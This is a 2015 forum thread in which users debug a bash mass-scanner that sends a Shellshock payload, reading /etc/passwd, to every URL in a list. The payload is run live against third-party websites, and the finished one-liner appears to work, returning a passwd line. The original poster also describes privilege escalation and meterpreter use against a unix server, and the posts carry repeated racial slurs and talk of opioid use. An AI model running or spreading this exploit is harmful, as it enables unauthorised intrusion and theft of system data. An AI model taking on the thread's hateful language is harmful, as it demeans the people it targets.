User Controls
ATTN: Auswitsch Nazi Disneyland
-
2015-12-18 at 4:26 PM UTC[size=6] I know you're good at Bash so help a nigga out pls[/size]
I has a script that is going to run some bash commands if certain criteria are met. Consider the following:
#/bin/bash
# Hurr durr loop and option parsing logic
# SNIP
"Test") # If list is loaded test for shellshock
if [ "$list" == "" ]
then
echo "To test a list of URLs one needs to be supplied via the 'List' option"
printf "%b \n"
else
`cat $list | xargs curl -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" | printf %b \n\n`
fi
# SNIP
Ok see the part where i am telling bash to run shell commands? Contents of list should be passed to curl via xargs, however the curl argument "custom: is essential to the proper way in which i intend to use curl to retrieve the data i want.However this is where a problem arises, backticks tell bash to treat what ever is inbetween them as shell commands as you know. However the quotation marks are problematic since they escape the backticked area of the code. If i don't add another quotation mark just before the end backtick the rest of the script is treated by bash as if it were shell commands which breaks the script but if i keep the quotation mark at the end curl doesn't do what i want.
Also printf /n prints a new line right? I am never sure. Lel.
So... wut do?
-
2015-12-18 at 6:15 PM UTCI also tried escaping " with backslash but now i get this error message:
$shellshocker.sh: command substitution: line 32: syntax error near unexpected token `('
$shellshocker.sh: command substitution: line 32: `cat $list | xargs curl -H \"custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd | printf %b \n'
-
2015-12-20 at 12:35 AM UTCShameless bump.
-
2015-12-20 at 4:37 PM UTCOk nigger since you're awol i did some research on all special shell characters in bash i am escaping them all and asked on stack overflow but you know how those niggers get. Anyway, new code:
`cat $list | xargs curl -H \"custom:\(\) \{ ignored; \}\; echo Content-Type: text/html\; echo \; /bin/cat /etc/passwd | printf %b \n`
This is the output from curl:
curl: (3) [globbing] unmatched brace at pos 2
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0curl: (6) Could not resolve host: ignored
100 12037 0 12037 0 0 10421 0 --:--:-- 0:00:01 --:--:-- 19254
100 5722 0 5722 0 0 6113 0 --:--:-- --:--:-- --:--:-- 8341
Also see how it's attempting to resolve the host "ignored" that's bullshit and not what i want i want xargs to pass a url as the first argument to curl, why is it not doing that?
But that's not all i get error messages as well, see the following.
$shellshocker.sh: line 32: };: command not found
$shellshocker.sh: line 32: <!DOCTYPE: command not found
bby pls, i need you so much right nao ;_; -
2015-12-20 at 9:39 PM UTCPosting from my dev account because fucking vb lets admins insert arbitrary html and it's fucking things up. Anyway.
The nice thing about bash it has a really good repl, even if we never think of it like that, so punching stuff into the command line to test step-by-step works well. So let's assume xargs is working right we would expect curl to be invoked with urls repeatedly so lets start from there:
[lanny:~]$ curl "http://niggasin.space/" -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd"
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>Access denied | niggasin.space used CloudFlare to restrict access</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
Well that works, now let's try to tack on the printf:
[lanny:~]$ curl "http://niggasin.space/" -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" | printf "%b \n\n"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3467 0 3467 0 0 101k 0 --:--:-- --:--:-- --:--:-- 102k
(23) Failed writing body
[lanny:~]$
Well that's interesting, let us contemplate the man page:
[lanny:~]$ man -P cat printf
PRINTF(1) BSD General Commands Manual PRINTF(1)
NAME
printf -- formatted output
SYNOPSIS
printf format [arguments ...]
DESCRIPTION
The printf utility formats and prints its arguments, after the first, under control of the format. The format is a
character string which contains three types of objects: plain characters, which are simply copied to standard out-
put, character escape sequences which are converted and copied to the standard output, and format specifications,
each of which causes printing of the next successive argument.
My emphasis added. printf operates on its arguments as opposed to stdin, which means it can't take input from a pipe on its own (pipes take stdout of the left hand side and feed it to stdin of the right). The distinction may seem trivial but it's important to understand and is the main reason we have xargs (you can think of xargs as a utility for transforming stdin into arguments) so let's try that:
[lanny:~]$ curl "http://niggasin.space/" -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" | xargs printf "%b NIGGA\n"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3467 0 3467 0 0 105k 0 --:--:-- --:--:-- --:--:-- 105k
<!DOCTYPE NIGGA
html> NIGGA
<!--[if NIGGA
lt NIGGA
IE NIGGA
7]> NIGGA
<html NIGGA
class=no-js ie6 oldie NIGGA
lang=en-US> NIGGA
Changed printf to be `printf "%b NIGGA\n"` just because that's easier to identify than a newline. So we're getting closer but I'm assuming you were trying to put a double newline between the result of each request rather than just at the end of each line. To do that we need to get a little trickier, let's try:
[lanny:~]$ echo "http://niggasin.space/\nhttp://yahoo.com/" | xargs -t -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'
bash -c curl http://niggasin.space/ -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>Access denied | niggasin.space used CloudFlare to restrict access</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />
<!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
<style type="text/css">body{margin:0;padding:0}</style>
<!--[if lte IE 9]><script type="text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script><![endif]-->
<!--[if gte IE 10]><!--><script type="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></script><!--<![endif]-->
<script type="text/javascript" src="/cdn-cgi/scripts/cf.common.js"></script>
</head>
<body>
<div id="cf-wrapper">
<div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
<div id="cf-error-details" class="cf-error-details-wrapper">
<div class="cf-wrapper cf-header cf-error-overview">
<h1>
<span class="cf-error-type" data-translate="error">Error</span>
<span class="cf-error-code">1012</span>
<small class="heading-ray-id">Ray ID: 257e65cd668011d1 • 2015-12-20 21:21:34 UTC</small>
</h1>
<h2 class="cf-subheadline" data-translate="error_desc">Access denied</h2>
</div><!-- /.header -->
<section></section><!-- spacer -->
<div class="cf-section cf-wrapper">
<div class="cf-columns two">
<div class="cf-column">
<h2 data-translate="what_happened">What happened?</h2>
<p>The owner of this website (niggasin.space) has forbidden your access based on malicious activity detected from your computer or your network (73.222.180.57). The most likely cause of this is a virus or malware infection on your machine. Please update your anti-virus software and run a full system scan.</p>
</div>
</div>
</div><!-- /.section -->
<div class="cf-error-footer cf-wrapper">
<p>
<span class="cf-footer-item">CloudFlare Ray ID: <strong>257e65cd668011d1</strong></span>
<span class="cf-footer-separator">•</span>
<span class="cf-footer-item"><span data-translate="your_ip">Your IP</span>: 73.222.180.57</span>
<span class="cf-footer-separator">•</span>
<span class="cf-footer-item"><span data-translate="performance_security_by">Performance & security by</span> <a data-orig-proto="https" data-orig-ref="www.cloudflare.com/5xx-error-landing?utm_source=error_footer" id="brand_link" target="_blank">CloudFlare</a></span>
</p>
</div><!-- /.error-footer -->
</div><!-- /#cf-error-details -->
</div><!-- /#cf-wrapper -->
<script type="text/javascript">
window._cf_translation = {};
</script>
</body>
</html>
----END OF RESPONSE----
bash -c curl http://yahoo.com/ -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----
<HTML>
<HEAD>
<TITLE>Error</TITLE>
</HEAD>
<BODY BGCOLOR="white" FGCOLOR="black">
<!-- status code : 301 -->
<!-- Error: GET -->
<!-- host machine: ir13.fp.ne1.yahoo.com -->
<!-- timestamp: 1450646494.000 -->
<!-- url: http://yahoo.com/-->
<H1>Error</H1>
<HR>
<FONT FACE="Helvetica,Arial"><B>
Description: Could not process this "GET" request.
</B></FONT>
<HR>
</BODY>
----END OF RESPONSE---
There we go, so let's look at why that works, here's our command:
echo "http://niggasin.space/\nhttp://yahoo.com/" | xargs -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'
So the left side of that pipe is just producing something for xargs to chew on. The "-t" flag just says "show me the command you're about to execute before you do it" when is why we see things like "bash -c curl http://yahoo.com/ -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----" in the output. You'll probably want to pull that flag out when using it, mostly for debugging. The "-I %" flag says "replace every instance of '%' that occur in the strings passed to xargs with the args formed from stdin". So what we want to do for each line of input is execute two commands, one for curl and one to insert our end of response marker. The idea of piping the output of xargs to printf was a good idea but just by nature of the execution model xargs doesn't indicate the difference between one invocation of its command and the next, it just produces a continuous stream so with your original command printf would only be invoked once rather than onc per execution of curl. So what we do here is execute "bash -c" which is just "start bash, run the command following -c, and exit" and is generally how you go from commands you build as strings to execution. So anyway, xargs does the % replace thing and then we run bash, which in turn runs curl and echo, then xargs moves onto the next item and does it all over again. Notice the single quote just before curl and its pair at the end, in bash-like shells single quotes are used for non-interpolated strings, so things like $VAR don't happen, you can use double quotes without escaping them, so on and so forth. Useful when you're writing a string with syntax the (top level) shell would otherwise try to parse.
There are probably other, probably better ways of doing this but it works as a one-liner so there you go. Would be interested if aldra has anything cleverer or cleaner (I've always felt like invoking sub-shells is kind of a kludge but I see it often enough that I think it's accepted as common practice). -
2015-12-20 at 10:06 PM UTC
Ok nigger since you're awol i did some research on all special shell characters in bash i am escaping them all and asked on stack overflow but you know how those niggers get. Anyway, new code:
`cat $list | xargs curl -H \"custom:\(\) \{ ignored; \}\; echo Content-Type: text/html\; echo \; /bin/cat /etc/passwd | printf %b \n`
This is the output from curl:
curl: (3) [globbing] unmatched brace at pos 2
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0curl: (6) Could not resolve host: ignored
100 12037 0 12037 0 0 10421 0 --:--:-- 0:00:01 --:--:-- 19254
100 5722 0 5722 0 0 6113 0 --:--:-- --:--:-- --:--:-- 8341
Also see how it's attempting to resolve the host "ignored" that's bullshit and not what i want i want xargs to pass a url as the first argument to curl, why is it not doing that?
But that's not all i get error messages as well, see the following.
$shellshocker.sh: line 32: };: command not found
$shellshocker.sh: line 32: !DOCTYPE: command not found
bby pls, i need you so much right nao ;_;
Different problem here, the escaping wasn't your problem to start with but it's causing problems here. Consider the following commands:
[lanny:~]$ echo "foobar"
foobar
[lanny:~]$ echo \"foobar\"
"foobar"
So normally your shell uses the double quote to indicate the start of a string, meaning any spaces following it are not to be treated as additional arguments so like `echo foo bar` invokes echo with two arguments while `echo "foo bar"` invokes it with one. When you escape a double quote (put a \ in front of it) it means "this is literally a backquote, it has no meaning to you (the shell)". So when you do `curl -H "custom:\(\)` you're saying invoke curl with two arguments, the second of which is literally:
[lanny:~]$ echo \"custom:\(\) | hexdump
0000000 22 63 75 73 74 6f 6d 3a 28 29 0a
000000b
so the first byte of the second argument is 0x22 or the quote character under ascii/utf-8. This causes problems because the next semi-colon is read as a special character in bash, it's says "execute the command on the left of the semicolon, and then the one on the right" a lot like "&&" does except "&&" requires the first command to exit normally, otherwise it won't run the next command.Anyway, this means your shell will try to run "curl -H "custom:\(\) \{ ignored" which may or may not be a valid invocation of curl and then it's going to try to run the "{;" command which I don't think is a thing. -
2015-12-20 at 10:39 PM UTCThanks that cleared a lot up but you talk so technical it's hard to follow sometime lol it was ok this time though i just needed to focus i had my mind on other cyber stuff when reading as you'll read below. But i suppose that's the nature of the topic here. I will blatantly steal your code and you will love me for it, and i love you for the excellent explanation as usual, breh.
I'll report any results. By the by, i am currently trying to priv-esc on a unix server and i have been at it for 6 hours straight JESUS FUCKING CHRIST i need a break, for some reason python never works so i can't use PyCat as an alternative to netcat to push a meterpreter through, and even then metasploit is messing with me the bind shell was acting weird. Generated fine and all but i think i need to configure it better. Anywhore i know you're not a sec guy just felt like venting. Thanks again brah. -
2015-12-21 at 2 AM UTCHmm, no errors but unexpected output.
Please enter your choice: 3
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 44169 0 44169 0 0 18875 0 --:--:-- 0:00:02 --:--:-- 18997
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 6965 0 6965 0 0 5872 0 --:--:-- 0:00:01 --:--:-- 5872
/c/PentestBox/bin/shellshocker.sh: line 33: root:x:0:0:root:/root:/bin/bash: No such file or directory -
2015-12-22 at 7:57 AM UTCHmm, what are the contents of line 33? Is it the line that does `bash -c "...`? You could try using "sh" instead of "bash" which is the normal way of doing things but I usually use zsh so if I want bash proper I've got to do "bash" instead of "sh".
-
2015-12-22 at 8:08 AM UTCI'll get back to you on this tomorrow i gotta go to bed i'm about to pass out from the oxycodone anyway,
-
2015-12-22 at 9:35 AM UTC
I'll get back to you on this tomorrow i gotta go to bed i'm about to pass out from the oxycodone anyway,
Remember to sleep on your side. -
2015-12-22 at 11:20 AM UTC
Remember to sleep on your side.
aww -
2015-12-22 at 3:09 PM UTC
Remember to sleep on your side.
Thanks bby, but i wasn't even close to an OD or nauseous had about 130mg, spread over a few hours which is a reasonable dose for me given the chronic tolerance i developed during my fentanyl junkie times. -
2015-12-22 at 3:32 PM UTC
Hmm, what are the contents of line 33? Is it the line that does `bash -c "…`? You could try using "sh" instead of "bash" which is the normal way of doing things but I usually use zsh so if I want bash proper I've got to do "bash" instead of "sh".
ok i have returned, currently the contents of line 33 in my script is:
`cat $list | xargs -0 bash -c 'curl -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'` -
2015-12-22 at 5:32 PM UTCSo yeah, maybe "bash" isn't on your path or aliased or whatever. Try this and see if anything changes:
`cat $list | xargs -0 sh -c 'curl -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'`
Also this is going to sound dumb but you should verify that you can run cat, xargs, sh, and echo each on their own. -
2015-12-22 at 9:34 PM UTC
So yeah, maybe "bash" isn't on your path or aliased or whatever. Try this and see if anything changes:
`cat $list | xargs -0 sh -c 'curl -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'`
Also this is going to sound dumb but you should verify that you can run cat, xargs, sh, and echo each on their own.
Looks like maybe now xargs isn't working,
curl: no URL specified! curl: try 'curl --help' or 'curl --manual' for more information
`cat $list | xargs -0 sh -c 'curl -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'`
When this runs. -
2015-12-23 at 5:56 AM UTCOh, I see, the xargs flags need to be changed per my first post itt, should have noticed that when you posted the line before. So the xargs invocation looks like:
xargs -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'
without the "-I %" and "curl %" xargs will try to add the url as an additional command to bash rather than curl. You can leave this -0 out, I think -I implies it. -
2015-12-23 at 8:23 AM UTC
Oh, I see, the xargs flags need to be changed per my first post itt, should have noticed that when you posted the line before. So the xargs invocation looks like:
xargs -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'
without the "-I %" and "curl %" xargs will try to add the url as an additional command to bash rather than curl. You can leave this -0 out, I think -I implies it.
[SIZE=72px]Booyah[/SIZE]
cat $list | xargs -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----'
Working code, now i'll add an option to save output to an outfile as well because the amount of output can be pretty crazy.
Thanks lan as usual you rock. Also remember a little while ago in T&T in a thread i made about owning a network through shellshock as well, that i wasn't getting output from my PyCat python net tool because it remains scanning until CTRL+C is sent and the script catches an exception and only then calls my usage function? You said the CGI model of execution requires the process to be completed within a certain time frame for it to properly buffer and send output back right? I improved my original scanner by adding a timer for the main loop.
# SNIP
try:
start = time.time()
while (time.time() - start < 15): # Main loop starts here.
# SNIP
Now we'll never have problems with the process taking to long to complete, and on a local network a normal scan of the entire subnet should not take more than a few seconds but i gave the script 15 as a margin.
So i'll be finsihing up my bash script and posting it to T&T and github later on.
